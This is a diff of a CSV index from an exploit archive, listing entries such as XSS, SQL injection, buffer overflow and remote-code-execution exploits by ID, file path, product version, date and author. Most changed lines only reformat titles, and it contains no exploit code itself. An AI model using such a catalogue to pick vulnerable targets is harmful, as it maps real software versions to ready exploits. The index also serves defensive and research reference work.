24782,platforms/php/webapps/24782.txt,"PHPCMS 1.1/1.2 Cross-Site Scripting Vulnerability",2004-11-26,"Cyrille Barthelemy",php,webapps,0 -24783,platforms/php/webapps/24783.txt,"pntresmailer 6.0 - Directory Traversal vulnerability",2004-11-26,"John Cobb",php,webapps,0 +24783,platforms/php/webapps/24783.txt,"pntresmailer 6.0 - Directory Traversal Vulnerability",2004-11-26,"John Cobb",php,webapps,0 24784,platforms/linux/remote/24784.txt,"File ELF 4.x Header Unspecified Buffer Overflow Vulnerability",2004-11-29,anonymous,linux,remote,0 24786,platforms/jsp/webapps/24786.txt,"Cisco Video Surveillance Operations Manager 6.3.2 - Multiple vulnerabilities",2013-03-15,Bassem,jsp,webapps,0 24788,platforms/windows/dos/24788.py,"Nitro Pro 8.0.3.1 - Crash PoC",2013-03-15,"John Cobb",windows,dos,0 @@ -21912,9 +21912,9 @@ id,file,description,date,author,platform,type,port 24790,platforms/php/webapps/24790.txt,"ClipShare 4.1.4 - Multiple Vulnerabilities",2013-03-15,AkaStep,php,webapps,0 24791,platforms/java/webapps/24791.txt,"Open-Xchange Server 6 - Multiple Vulnerabilities",2013-03-15,"Martin Braun",java,webapps,0 24792,platforms/multiple/webapps/24792.txt,"IPCop 1.4.1 Web Administration Interface Proxy Log HTML Injection Vulnerability",2004-11-30,"Paul Kurczaba",multiple,webapps,0 -24793,platforms/multiple/dos/24793.txt,"JanaServer 2 Multiple Remote Denial of Service Vulnerabilities",2004-11-30,"Luigi Auriemma",multiple,dos,0 -24794,platforms/linux/remote/24794.sh,"SCPOnly 2.x/3.x Remote Arbitrary Command Execution Vulnerability",2004-12-02,"Jason Wies",linux,remote,0 -24795,platforms/linux/remote/24795.txt,"RSSH 2.x Remote Arbitrary Command Execution Vulnerability",2004-12-02,"Jason Wies",linux,remote,0 +24793,platforms/multiple/dos/24793.txt,"JanaServer 2 - Multiple Remote Denial of Service Vulnerabilities",2004-11-30,"Luigi Auriemma",multiple,dos,0 +24794,platforms/linux/remote/24794.sh,"SCPOnly 2.x/3.x - Remote Arbitrary Command Execution Vulnerability",2004-12-02,"Jason Wies",linux,remote,0 +24795,platforms/linux/remote/24795.txt,"RSSH 2.x - Remote Arbitrary Command Execution Vulnerability",2004-12-02,"Jason Wies",linux,remote,0 24796,platforms/php/webapps/24796.txt,"Blog Torrent 0.8 - Remote Directory Traversal Vulnerability",2004-12-02,"Steve Kemp",php,webapps,0 24797,platforms/php/webapps/24797.txt,"Advanced Guestbook 2.2/2.3 Cross-Site Scripting Vulnerability",2004-12-02,"Emile van Elen",php,webapps,0 24798,platforms/php/webapps/24798.txt,"PAFileDB 3.1 Error Message Path Disclosure Vulnerability",2004-12-04,y3dips,php,webapps,0 @@ -21925,14 +21925,14 @@ id,file,description,date,author,platform,type,port 24803,platforms/php/webapps/24803.txt,"Blog Torrent 0.80 BTDownload.PHP Cross-Site Scripting Vulnerability",2004-12-07,Lostmon,php,webapps,0 24804,platforms/linux/dos/24804.c,"Linux Kernel 2.6.x - AIO_Free_Ring Local Denial of Service Vulnerability",2004-12-07,"Darrick J. Wong",linux,dos,0 24805,platforms/multiple/dos/24805.txt,"MySQL MaxDB 7.5 WAHTTP Server Remote Denial of Service Vulnerability",2004-12-07,"Evgeny Demidov",multiple,dos,0 -24806,platforms/php/webapps/24806.txt,"darryl burgdorf weblibs 1.0 - Directory Traversal vulnerability",2004-12-07,"John Bissell",php,webapps,0 +24806,platforms/php/webapps/24806.txt,"darryl burgdorf weblibs 1.0 - Directory Traversal Vulnerability",2004-12-07,"John Bissell",php,webapps,0 24807,platforms/multiple/dos/24807.txt,"MD5 Message Digest Algorithm Hash Collision Weakness",2004-12-07,"Dan Kaminsky",multiple,dos,0 24808,platforms/windows/remote/24808.txt,"Microsoft Internet Explorer 6.0 Search Pane URI Obfuscation Vulnerability",2004-12-08,http-equiv,windows,remote,0 24809,platforms/multiple/dos/24809.txt,"Kerio Personal Firewall 2.1.x/4.x Local Denial of Service Vulnerability",2004-12-08,cesaro,multiple,dos,0 24810,platforms/php/webapps/24810.txt,"PhpGedView 2.x Descendancy.PHP Cross-Site Scripting Vulnerability",2004-01-19,JeiAr,php,webapps,0 24811,platforms/windows/remote/24811.txt,"F-Secure Policy Manager 5.11 FSMSH.DLL CGI Application Installation Path Disclosure Vulnerability",2004-12-09,oliver@greyhat.de,windows,remote,0 24812,platforms/windows/dos/24812.py,"aktiv-player 2.9.0 - Crash PoC",2013-03-15,metacom,windows,dos,0 -24813,platforms/linux/remote/24813.pl,"gnu wget 1.x Multiple Vulnerabilities",2004-12-10,"Jan Minar",linux,remote,0 +24813,platforms/linux/remote/24813.pl,"gnu wget 1.x - Multiple Vulnerabilities",2004-12-10,"Jan Minar",linux,remote,0 24814,platforms/php/webapps/24814.txt,"PhpGedView 2.5/2.6 Index.PHP Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0 24815,platforms/linux/dos/24815.txt,"Gamespy Software Development Kit CD-Key Validation Buffer Overflow Vulnerability",2004-12-10,"Luigi Auriemma",linux,dos,0 24816,platforms/php/webapps/24816.txt,"PhpGedView 2.5/2.6 Individual.PHP Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0 @@ -21972,8 +21972,8 @@ id,file,description,date,author,platform,type,port 24851,platforms/php/webapps/24851.txt,"Joomla RSfiles Component (cid param) - SQL Injection Vulnerability",2013-03-18,ByEge,php,webapps,0 24852,platforms/linux/remote/24852.txt,"MPG123 0.59 Find Next File Remote Client-Side Buffer Overflow Vulnerability",2004-12-15,"Bartlomiej Sieka",linux,remote,0 24853,platforms/linux/remote/24853.c,"MPlayer 0.9/1.0 MMST Get_Header Remote Client-Side Buffer Overflow Vulnerability",2004-12-15,"Ariel Berkman",linux,remote,0 -24854,platforms/php/dos/24854.txt,"PHP 3/4/5 Multiple Local And Remote Vulnerabilities (1)",2004-12-15,"Stefan Esser",php,dos,0 -24855,platforms/php/dos/24855.txt,"PHP 3/4/5 Multiple Local And Remote Vulnerabilities (2)",2004-12-15,Slythers,php,dos,0 +24854,platforms/php/dos/24854.txt,"PHP 3/4/5 - Multiple Local And Remote Vulnerabilities (1)",2004-12-15,"Stefan Esser",php,dos,0 +24855,platforms/php/dos/24855.txt,"PHP 3/4/5 - Multiple Local And Remote Vulnerabilities (2)",2004-12-15,Slythers,php,dos,0 24856,platforms/linux/remote/24856.c,"NapShare 1.2 - Remote Buffer Overflow Vulnerability (1)",2004-12-06,"Bartlomiej Sieka",linux,remote,0 24857,platforms/linux/remote/24857.c,"NapShare 1.2 - Remote Buffer Overflow Vulnerability (2)",2004-12-10,"Bartlomiej Sieka",linux,remote,0 24858,platforms/php/webapps/24858.html,"WordPress Occasions Plugin 1.0.4 - CSRF Vulnerability",2013-03-19,m3tamantra,php,webapps,0 @@ -21981,7 +21981,7 @@ id,file,description,date,author,platform,type,port 24860,platforms/hardware/webapps/24860.txt,"Verizon Fios Router MI424WR-GEN3I - CSRF Vulnerability",2013-03-19,"Jacob Holcomb",hardware,webapps,0 24861,platforms/php/webapps/24861.txt,"Rebus:list (list.php, list_id param) - SQL Injection Vulnerability",2013-03-19,"Robert Cooper",php,webapps,0 24862,platforms/php/webapps/24862.txt,"ViewGit 0.0.6 - Multiple XSS Vulnerabilities",2013-03-19,"Matthew R. Bucci",php,webapps,0 -24863,platforms/windows/local/24863.html,"EastFTP 4.6.02 - ActiveX Control 0Day",2013-03-20,Dr_IDE,windows,local,0 +24863,platforms/windows/local/24863.html,"EastFTP 4.6.02 - ActiveX Control (0day)",2013-03-20,Dr_IDE,windows,local,0 24864,platforms/hardware/webapps/24864.pl,"StarVedia IPCamera IC502w IC502w+ v020313 - Username/Password Disclosure",2013-03-22,"Todor Donev",hardware,webapps,0 24865,platforms/linux/dos/24865.txt,"GnuTLS libgnutls Double-free Certificate List Parsing Remote DoS",2013-03-22,"Shawn the R0ck",linux,dos,0 24866,platforms/hardware/dos/24866.txt,"TP-Link TL-WR740N Wireless Router - Denial of Service Exploit",2013-03-22,LiquidWorm,hardware,dos,0 @@ -22001,8 +22001,8 @@ id,file,description,date,author,platform,type,port 24881,platforms/php/webapps/24881.txt,"ClipShare 4.1.1 (gmembers.php, gid param) - Blind SQL Injection Vulnerability",2013-03-25,Esac,php,webapps,0 24882,platforms/php/webapps/24882.pl,"vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28 - SQL Injection",2013-03-25,"Orestis Kourides",php,webapps,0 24883,platforms/php/webapps/24883.rb,"Ra1NX PHP Bot - pubcall Authentication Bypass Remote Code Execution",2013-03-25,bwall,php,webapps,0 -24884,platforms/windows/local/24884.html,"LiquidXML Studio 2012 ActiveX Insecure Method Executable File Creation 0day",2013-03-25,Dr_IDE,windows,local,0 -24885,platforms/windows/local/24885.html,"LiquidXML Studio 2010 ActiveX Remote 0day",2013-03-25,Dr_IDE,windows,local,0 +24884,platforms/windows/local/24884.html,"LiquidXML Studio 2012 - ActiveX Insecure Method Executable File Creation (0day)",2013-03-25,Dr_IDE,windows,local,0 +24885,platforms/windows/local/24885.html,"LiquidXML Studio 2010 - ActiveX Remote (0day)",2013-03-25,Dr_IDE,windows,local,0 24886,platforms/windows/remote/24886.html,"Mitsubishi MX ActiveX Component 3 - (ActUWzd.dll (WzTitle)) - Remote Exploit",2013-03-25,Dr_IDE,windows,remote,0 24887,platforms/windows/remote/24887.rb,"KingView Log File Parsing Buffer Overflow",2013-03-25,metasploit,windows,remote,0 24888,platforms/linux/remote/24888.rb,"Mutiny Remote Command Execution",2013-03-25,metasploit,linux,remote,0 @@ -22014,14 +22014,14 @@ id,file,description,date,author,platform,type,port 24894,platforms/php/webapps/24894.txt,"ClipShare 4.1.1 - Multiples Vulnerabilites",2013-03-27,Esac,php,webapps,0 24896,platforms/hardware/dos/24896.sh,"Konftel 300IP SIP-based Conference Phone <= 2.1.2 - Remote Bypass Reboot",2013-03-29,"Todor Donev",hardware,dos,0 24897,platforms/windows/remote/24897.rb,"KNet Web Server 1.04b - Buffer Overflow SEH",2013-03-29,"Myo Soe",windows,remote,0 -24898,platforms/php/webapps/24898.txt,"SynConnect PMS (index.php, loginid param) - SQL Injection Vulnerability",2013-03-29,"Bhadresh Patel",php,webapps,0 +24898,platforms/php/webapps/24898.txt,"SynConnect Pms (index.php, loginid param) - SQL Injection Vulnerability",2013-03-29,"Bhadresh Patel",php,webapps,0 24899,platforms/hardware/local/24899.txt,"Draytek Vigor 3900 1.06 - Privilege Escalation",2013-03-29,"Mohammad abou hayt",hardware,local,0 24901,platforms/windows/webapps/24901.txt,"MailOrderWorks 5.907 - Multiple Vulnerabilities",2013-03-29,Vulnerability-Lab,windows,webapps,0 24902,platforms/php/remote/24902.rb,"STUNSHELL Web Shell Remote PHP Code Execution",2013-03-29,metasploit,php,remote,0 24903,platforms/php/remote/24903.rb,"STUNSHELL Web Shell Remote Code Execution",2013-03-29,metasploit,php,remote,0 24904,platforms/windows/remote/24904.rb,"Java CMM Remote Code Execution",2013-03-29,metasploit,windows,remote,0 24905,platforms/multiple/remote/24905.rb,"v0pCr3w Web Shell - Remote Code Execution",2013-03-29,metasploit,multiple,remote,0 -24906,platforms/php/webapps/24906.txt,"AWS XMS 2.5 (importer.php, what param) - Directory Traversal Vulnerability",2013-03-29,"High-Tech Bridge SA",php,webapps,0 +24906,platforms/php/webapps/24906.txt,"AWS Xms 2.5 - (importer.php, what param) - Directory Traversal Vulnerability",2013-03-29,"High-Tech Bridge SA",php,webapps,0 24907,platforms/windows/remote/24907.txt,"McAfee Virtual Technician (MVT) 6.5.0.2101 - Insecure ActiveX Method",2013-03-29,"High-Tech Bridge SA",windows,remote,0 24910,platforms/windows/local/24910.txt,"VirtualDJ Pro/Home <= 7.3 - Buffer Overflow Vulnerability",2013-04-02,"Alexandro Sánchez Bach",windows,local,0 24911,platforms/php/webapps/24911.txt,"Pollen CMS 0.6 (index.php, p param) - Local File Disclosure",2013-04-02,MizoZ,php,webapps,0 @@ -22054,7 +22054,7 @@ id,file,description,date,author,platform,type,port 24943,platforms/windows/remote/24943.py,"BigAnt Server 2.97 - DDNF Username Buffer Overflow",2013-04-10,"Craig Freyman",windows,remote,0 24944,platforms/windows/remote/24944.py,"FreeFloat FTP 1.0 - DEP Bypass with ROP",2013-04-10,negux,windows,remote,0 24945,platforms/hardware/remote/24945.rb,"Linksys WRT54GL apply.cgi Command Execution",2013-04-10,metasploit,hardware,remote,0 -24946,platforms/multiple/remote/24946.rb,"Adobe ColdFusion APSB13-03 Remote Exploit",2013-04-10,metasploit,multiple,remote,0 +24946,platforms/multiple/remote/24946.rb,"Adobe ColdFusion APSB13-03 - Remote Exploit",2013-04-10,metasploit,multiple,remote,0 24947,platforms/linux/remote/24947.txt,"MongoDB 2.2.3 nativeHelper.apply - Remote Code Execution",2013-04-08,agixid,linux,remote,0 24950,platforms/windows/remote/24950.pl,"KNet Web Server 1.04b - Stack Corruption BoF",2013-04-12,Wireghoul,windows,remote,0 24951,platforms/linux/dos/24951.pl,"ircd-hybrid 8.0.5 - Denial of Service",2013-04-12,kingcope,linux,dos,0 @@ -22066,7 +22066,7 @@ id,file,description,date,author,platform,type,port 24957,platforms/php/webapps/24957.txt,"Vanilla Forums Van2Shout Plugin 1.0.51 - Multiple CSRF Vulnerabilities",2013-04-15,"Henry Hoggard",php,webapps,0 24958,platforms/windows/remote/24958.py,"MinaliC Webserver 2.0.0 - Buffer Overflow",2013-04-15,superkojiman,windows,remote,0 24959,platforms/php/webapps/24959.txt,"CMSLogik 1.2.1 - Multiple Vulnerabilities",2013-04-15,LiquidWorm,php,webapps,0 -24960,platforms/php/webapps/24960.txt,"phpVMS Virtual Airline Administration 2.1.934 & 2.1.935 - SQL Injection Vulnerability",2013-04-15,NoGe,php,webapps,0 +24960,platforms/php/webapps/24960.txt,"phpVms Virtual Airline Administration 2.1.934 & 2.1.935 - SQL Injection Vulnerability",2013-04-15,NoGe,php,webapps,0 24961,platforms/windows/remote/24961.html,"FirePHP Firefox Plugin 0.7.1 - Remote Command Execution",2013-04-17,Wireghoul,windows,remote,0 24962,platforms/windows/dos/24962.txt,"Foxit Reader 5.4.3.x - 5.4.5.0124 - PDF XREF Parsing Denial of Service Vulnerability",2013-04-18,FuzzMyApp,windows,dos,0 24963,platforms/multiple/remote/24963.rb,"SAP ConfigServlet OS Command Execution",2013-04-18,"Andras Kabai",multiple,remote,50000 @@ -22082,7 +22082,7 @@ id,file,description,date,author,platform,type,port 24975,platforms/hardware/webapps/24975.txt,"D'Link DIR-615 Hardware rev D3 / DIR-300 - Hardware rev A - Multiple Vulnerabilities",2013-04-23,m-1-k-3,hardware,webapps,0 24976,platforms/multiple/remote/24976.rb,"Java Applet Reflection Type Confusion Remote Code Execution",2013-04-23,metasploit,multiple,remote,0 24977,platforms/linux/remote/24977.txt,"CUPS 1.1.x HPGL File Processor Buffer Overflow Vulnerability",2004-12-15,"Ariel Berkman",linux,remote,0 -24978,platforms/linux/remote/24978.txt,"Xine-Lib 0.9/1 Remote Client-Side Buffer Overflow Vulnerability",2004-12-16,"Ariel Berkman",linux,remote,0 +24978,platforms/linux/remote/24978.txt,"Xine-Lib 0.9/1 - Remote Client-Side Buffer Overflow Vulnerability",2004-12-16,"Ariel Berkman",linux,remote,0 24979,platforms/multiple/remote/24979.txt,"XLReader 0.9 - Remote Client-Side Buffer Overflow Vulnerability",2004-12-16,"Kris Kubicki",multiple,remote,0 24980,platforms/multiple/remote/24980.txt,"Yanf 0.4 HTTP Response Buffer Overflow Vulnerability",2004-12-15,"Ariel Berkman",multiple,remote,0 24981,platforms/multiple/remote/24981.txt,"JPegToAvi 1.5 File List Buffer Overflow Vulnerability",2004-12-15,"James Longstreet",multiple,remote,0 @@ -22090,15 +22090,15 @@ id,file,description,date,author,platform,type,port 24983,platforms/multiple/remote/24983.txt,"Vilistextum 2.6.6 HTML Attribute Parsing Buffer Overflow Vulnerability",2004-12-15,"Ariel Berkman",multiple,remote,0 24984,platforms/multiple/remote/24984.txt,"2Fax 3.0 Tab Expansion Buffer Overflow Vulnerability",2004-12-15,"Ariel Berkman",multiple,remote,0 24985,platforms/php/remote/24985.txt,"PHP 4/5 addslashes() NULL Byte Bypass",2004-12-16,"Daniel Fabian",php,remote,0 -24986,platforms/cgi/webapps/24986.txt,"Ikonboard 3.x Multiple Remote SQL Injection Vulnerabilities",2004-12-16,anonymous,cgi,webapps,0 -24987,platforms/php/webapps/24987.txt,"JSBoard 2.0.x Remote Arbitrary Script Upload Vulnerability",2004-12-16,"Jeremy Bae",php,webapps,0 +24986,platforms/cgi/webapps/24986.txt,"Ikonboard 3.x - Multiple Remote SQL Injection Vulnerabilities",2004-12-16,anonymous,cgi,webapps,0 +24987,platforms/php/webapps/24987.txt,"JSBoard 2.0.x - Remote Arbitrary Script Upload Vulnerability",2004-12-16,"Jeremy Bae",php,webapps,0 24988,platforms/php/webapps/24988.txt,"WordPress 1.2.1/1.2.2 /wp-admin/post.php content Parameter XSS",2004-12-16,"Thomas Waldegger",php,webapps,0 24989,platforms/php/webapps/24989.txt,"WordPress 1.2.1/1.2.2 /wp-admin/templates.php file Parameter XSS",2004-12-16,"Thomas Waldegger",php,webapps,0 24990,platforms/php/webapps/24990.txt,"WordPress 1.2.1/1.2.2 link-add.php Multiple Parameter XSS",2004-12-16,"Thomas Waldegger",php,webapps,0 24991,platforms/php/webapps/24991.txt,"WordPress 1.2.1/1.2.2 link-categories.php cat_id Parameter XSS",2004-12-16,"Thomas Waldegger",php,webapps,0 24992,platforms/php/webapps/24992.txt,"WordPress 1.2.1/1.2.2 link-manager.php Multiple Parameter XSS",2004-12-16,"Thomas Waldegger",php,webapps,0 24993,platforms/php/webapps/24993.txt,"WordPress 1.2.1/1.2.2 moderation.php item_approved Parameter XSS",2004-12-16,"Thomas Waldegger",php,webapps,0 -24994,platforms/php/webapps/24994.txt,"MediaWiki 1.3.x Remote Arbitrary Script Upload Vulnerability",2004-12-16,"Jeremy Bae",php,webapps,0 +24994,platforms/php/webapps/24994.txt,"MediaWiki 1.3.x - Remote Arbitrary Script Upload Vulnerability",2004-12-16,"Jeremy Bae",php,webapps,0 24995,platforms/multiple/remote/24995.txt,"DXFScope 0.2 - Remote Client-Side Buffer Overflow Vulnerability",2004-12-16,"Ariel Berkman",multiple,remote,0 24996,platforms/windows/remote/24996.rb,"SAP ConfigServlet Remote Unauthenticated Payload Execution",2013-04-25,"Andras Kabai",windows,remote,0 24999,platforms/windows/remote/24999.py,"Windows Light HTTPD 0.1 - Buffer Overflow",2013-04-25,"Jacob Holcomb",windows,remote,0 @@ -22120,7 +22120,7 @@ id,file,description,date,author,platform,type,port 25016,platforms/windows/remote/25016.txt,"ASP2PHP 0.76.23 Preparse Token Variable Buffer Overflow Vulnerability",2004-12-15,"Qiao Zhang",windows,remote,0 25017,platforms/linux/dos/25017.txt,"UML_Utilities User-Mode Linux uml_utilities 20030903 UML_Net Slip Network Interface Denial of Service Vulnerability",2004-12-15,"Danny Lungstrom",linux,dos,0 25018,platforms/multiple/remote/25018.txt,"ABC2MTEX 1.6.1 Process ABC Key Field Buffer Overflow Vulnerability",2004-12-15,"Limin Wang",multiple,remote,0 -25019,platforms/multiple/remote/25019.txt,"ABC2MIDI 2004-12-04 Multiple Stack Buffer Overflow Vulnerabilities",2004-12-15,"Limin Wang",multiple,remote,0 +25019,platforms/multiple/remote/25019.txt,"ABC2MIDI 2004-12-04 - Multiple Stack Buffer Overflow Vulnerabilities",2004-12-15,"Limin Wang",multiple,remote,0 25020,platforms/windows/remote/25020.txt,"Michael Kohn VB2C 0.02 FRM File Remote Buffer Overflow Vulnerability",2004-12-15,"Qiao Zhang",windows,remote,0 25021,platforms/windows/remote/25021.txt,"ABCPP 1.3 Directive Handler Buffer Overflow Vulnerability",2004-12-15,"Yosef Klein",windows,remote,0 25022,platforms/windows/remote/25022.txt,"Jef Moine abcm2ps 3.7.20 ABC File Remote Buffer Overflow Vulnerability",2004-12-15,"Limin Wang",windows,remote,0 @@ -22142,7 +22142,7 @@ id,file,description,date,author,platform,type,port 25038,platforms/php/webapps/25038.txt,"Kayako eSupport 2.x Ticket System Multiple SQL Injection",2004-12-18,"James Bercegay",php,webapps,0 25039,platforms/aix/local/25039.txt,"IBM AIX 5.x Diag Local Privilege Escalation Vulnerabilities",2004-12-20,cees-bart,aix,local,0 25040,platforms/php/local/25040.php,"PHP 4.x/5.0 Shared Memory Module Offset Memory Corruption Vulnerability",2004-12-20,"Stefano Di Paola",php,local,0 -25041,platforms/cgi/webapps/25041.txt,"escripts software e_board 4.0 - Directory Traversal vulnerability",2004-12-20,white_e@nogimmick.org,cgi,webapps,0 +25041,platforms/cgi/webapps/25041.txt,"escripts software e_board 4.0 - Directory Traversal Vulnerability",2004-12-20,white_e@nogimmick.org,cgi,webapps,0 25042,platforms/cgi/webapps/25042.txt,"Tlen.pl 5.23.4 .1 Instant Messenger Remote Script Execution Vulnerability",2004-12-20,"Jaroslaw Sajko",cgi,webapps,0 25043,platforms/php/webapps/25043.txt,"PHPGroupWare 0.9.14 Tables_Update.Inc.PHP Remote File Include Vulnerability",2004-01-27,"Cedric Cochin",php,webapps,0 25044,platforms/php/webapps/25044.txt,"PHPGroupWare 0.9.x Index.PHP HTML Injection Vulnerability",2004-01-27,"Cedric Cochin",php,webapps,0 @@ -22155,11 +22155,11 @@ id,file,description,date,author,platform,type,port 25051,platforms/cgi/webapps/25051.txt,"Wirtualna Polska WPKontakt 3.0.1 - Remote Script Execution Vulnerability",2004-12-23,"Poznan Supercomputing",cgi,webapps,0 25052,platforms/php/webapps/25052.pl,"Siteman 1.1 User Database Privilege Escalation Vulnerability (1)",2005-01-19,"Noam Rathaus",php,webapps,0 25053,platforms/php/webapps/25053.html,"Siteman 1.1 User Database Privilege Escalation Vulnerability (2)",2005-01-19,amironline452,php,webapps,0 -25054,platforms/linux/remote/25054.txt,"konversation irc client 0.15 Multiple Vulnerabilities",2005-01-19,wouter@coekaerts.be,linux,remote,0 +25054,platforms/linux/remote/25054.txt,"konversation irc client 0.15 - Multiple Vulnerabilities",2005-01-19,wouter@coekaerts.be,linux,remote,0 25055,platforms/osx/local/25055.c,"Darwin Kernel 7.1 Mach File Parsing Local Integer Overflow Vulnerability",2005-01-19,nemo@felinemenace.org,osx,local,0 25056,platforms/multiple/dos/25056.html,"Netscape Navigator 7.2 Infinite Array Sort Denial of Service Vulnerability",2005-01-21,"Berend-Jan Wever",multiple,dos,0 25057,platforms/windows/remote/25057.txt,"DivX Player 2.6 Skin File Directory Traversal Vulnerability",2005-01-21,"Luigi Auriemma",windows,remote,0 -25058,platforms/php/webapps/25058.txt,"Exponent CMS 0.95 Multiple Cross-Site Scripting Vulnerabilities",2005-12-25,y3dips,php,webapps,0 +25058,platforms/php/webapps/25058.txt,"Exponent CMS 0.95 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-25,y3dips,php,webapps,0 25059,platforms/php/webapps/25059.txt,"MercuryBoard 1.1 - Multiple Input Validation Vulnerabilities",2005-01-25,"Alberto Trivero",php,webapps,0 25060,platforms/asp/webapps/25060.txt,"Comersus Cart 5.0/6.0 - Multiple Vulnerabilities",2005-01-25,"raf somers",asp,webapps,0 25061,platforms/windows/dos/25061.txt,"Nullsoft Winamp 5.0.x Variant IN_CDDA.dll Remote Buffer Overflow Vulnerability",2005-01-25,"Yu Yang",windows,dos,0 @@ -22175,16 +22175,16 @@ id,file,description,date,author,platform,type,port 25071,platforms/php/webapps/25071.txt,"Captaris Infinite Mobile Delivery Webmail 2.6 Path Disclosure Vulnerability",2005-01-29,steven@lovebug.org,php,webapps,0 25072,platforms/multiple/remote/25072.txt,"CitrusDB 0.1/0.2/0.3 Credit Card Data Remote Information Disclosure Vulnerability",2005-01-31,"Maximillian Dornseif",multiple,remote,0 25073,platforms/php/webapps/25073.txt,"JShop E-Commerce Suite 1.2 Product.PHP Cross-Site Scripting Vulnerability",2005-01-31,SmOk3,php,webapps,0 -25074,platforms/php/webapps/25074.txt,"xoops incontent module 3.0 - Directory Traversal vulnerability",2005-01-28,Lostmon,php,webapps,0 +25074,platforms/php/webapps/25074.txt,"xoops incontent module 3.0 - Directory Traversal Vulnerability",2005-01-28,Lostmon,php,webapps,0 25075,platforms/multiple/dos/25075.pl,"Eternal Lines Web Server 1.0 - Remote Denial of Service Vulnerability",2005-02-01,"Ziv Kamir",multiple,dos,0 -25076,platforms/linux/dos/25076.c,"postgresql 7.x Multiple Vulnerabilities",2005-02-01,ChoiX,linux,dos,0 +25076,platforms/linux/dos/25076.c,"postgresql 7.x - Multiple Vulnerabilities",2005-02-01,ChoiX,linux,dos,0 25077,platforms/linux/dos/25077.txt,"Newspost 2.0/2.1 - Remote Buffer Overflow Vulnerability",2005-02-01,"Niels Heinen",linux,dos,0 25078,platforms/asp/webapps/25078.txt,"Eurofull E-Commerce Mensresp.ASP Cross-Site Scripting Vulnerability",2005-02-02,Yani-ari,asp,webapps,0 25079,platforms/multiple/remote/25079.txt,"People Can Fly Painkiller Gamespy 1.3 CD-Key Hash Remote Buffer Overflow Vulnerability",2005-02-02,"Luigi Auriemma",multiple,remote,0 -25080,platforms/linux/local/25080.txt,"Newsgrab 0.5.0pre4 Multiple Local And Remote Vulnerabilities",2005-02-02,"Niels Heinen",linux,local,0 +25080,platforms/linux/local/25080.txt,"Newsgrab 0.5.0pre4 - Multiple Local And Remote Vulnerabilities",2005-02-02,"Niels Heinen",linux,local,0 25081,platforms/multiple/dos/25081.txt,"LANChat Pro Revival 1.666c UDP Processing Remote Denial of Service Vulnerability",2005-04-29,"Donato Ferrante",multiple,dos,0 25082,platforms/hardware/dos/25082.txt,"Linksys PSUS4 PrintServer Malformed HTTP POST Request Denial of Service",2005-02-03,"laurent oudot",hardware,dos,0 -25083,platforms/windows/dos/25083.txt,"RaidenHTTPD 1.1.27 Remote File Disclosure Vulnerability",2005-02-05,"Donato Ferrante",windows,dos,0 +25083,platforms/windows/dos/25083.txt,"RaidenHTTPD 1.1.27 - Remote File Disclosure Vulnerability",2005-02-05,"Donato Ferrante",windows,dos,0 25084,platforms/asp/webapps/25084.txt,"Microsoft Outlook 2003 Web Access Login Form Remote URI Redirection Vulnerability",2005-02-07,"Morning Wood",asp,webapps,0 25085,platforms/windows/dos/25085.txt,"Microsoft Office XP 2000/2002 HTML Link Processing Remote Buffer Overflow Vulnerability",2005-02-08,"Rafel Ivgi",windows,dos,0 25086,platforms/windows/webapps/25086.pl,"Ipswitch IMail 11.01 - XSS Vulnerability",2013-04-29,DaOne,windows,webapps,0 @@ -22192,7 +22192,7 @@ id,file,description,date,author,platform,type,port 25088,platforms/php/webapps/25088.txt,"Foe CMS 1.6.5 - Multiple Vulnerabilities",2013-04-29,flux77,php,webapps,0 25089,platforms/php/webapps/25089.txt,"PHP-Fusion 4.0 Viewthread.PHP Information Disclosure Vulnerbility",2005-02-08,TheGreatOne2176,php,webapps,0 25090,platforms/php/webapps/25090.txt,"XGB 2.0 Authentication Bypass Vulnerability",2005-02-08,"Albania Security Clan",php,webapps,0 -25091,platforms/multiple/remote/25091.txt,"realnetworks realarcade 1.2 .0.994 Multiple Vulnerabilities",2005-02-08,"Luigi Auriemma",multiple,remote,0 +25091,platforms/multiple/remote/25091.txt,"realnetworks realarcade 1.2 .0.994 - Multiple Vulnerabilities",2005-02-08,"Luigi Auriemma",multiple,remote,0 25092,platforms/windows/remote/25092.txt,"Software602 602 Lan Suite 2004 2004.0.04.1221 Arbitrary File Upload Vulnerability",2005-02-08,"Tan Chew Keong",windows,remote,0 25093,platforms/php/webapps/25093.txt,"MercuryBoard 1.1 INDEX.PHP SQL Injection Vulnerability",2005-02-09,Zeelock,php,webapps,0 25094,platforms/windows/remote/25094.c,"MSN Messenger 6.2.0137 PNG Buffer Overflow Vulnerability",2005-02-08,ATmaCA,windows,remote,0 @@ -22204,7 +22204,7 @@ id,file,description,date,author,platform,type,port 25100,platforms/php/webapps/25100.txt,"CitrusDB 0.3.6 uploadcc.php Arbitrary Database Injection",2005-02-15,"RedTeam Pentesting",php,webapps,0 25101,platforms/php/webapps/25101.txt,"CitrusDB 0.3.6 importcc.php CSV File SQL Injection",2005-02-15,"RedTeam Pentesting",php,webapps,0 25102,platforms/php/webapps/25102.txt,"CitrusDB 0.3.6 - Remote Authentication Bypass Vulnerability",2004-02-15,"RedTeam Pentesting",php,webapps,0 -25103,platforms/php/webapps/25103.txt,"PHP-Nuke 6.x/7.x Multiple Cross-Site Scripting Vulnerabilities",2005-02-15,waraxe,php,webapps,0 +25103,platforms/php/webapps/25103.txt,"PHP-Nuke 6.x/7.x - Multiple Cross-Site Scripting Vulnerabilities",2005-02-15,waraxe,php,webapps,0 25104,platforms/php/webapps/25104.txt,"CitrusDB 0.3.6 Arbitrary Local PHP File Include Vulnerability",2005-02-15,"RedTeam Pentesting",php,webapps,0 25105,platforms/php/webapps/25105.txt,"OSCommerce 2.2 Contact_us.PHP Cross-Site Scripting Vulnerability",2005-02-15,"John Cobb",php,webapps,0 25106,platforms/linux/local/25106.c,"Typespeed 0.4.1 - Local Format String Vulnerability",2005-02-16,"Ulf Harnhammar",linux,local,0 @@ -22234,7 +22234,7 @@ id,file,description,date,author,platform,type,port 25130,platforms/windows/local/25130.py,"FuzeZip 1.0.0.131625 - SEH Buffer Overflow",2013-05-01,RealPentesting,windows,local,0 25131,platforms/windows/local/25131.py,"WinArchiver 3.2 - SEH Buffer Overflow",2013-05-01,RealPentesting,windows,local,0 25132,platforms/multiple/remote/25132.txt,"Bontago Game Server 1.1 - Remote Nickname Buffer Overrun Vulnerability",2005-02-21,"Luigi Auriemma",multiple,remote,0 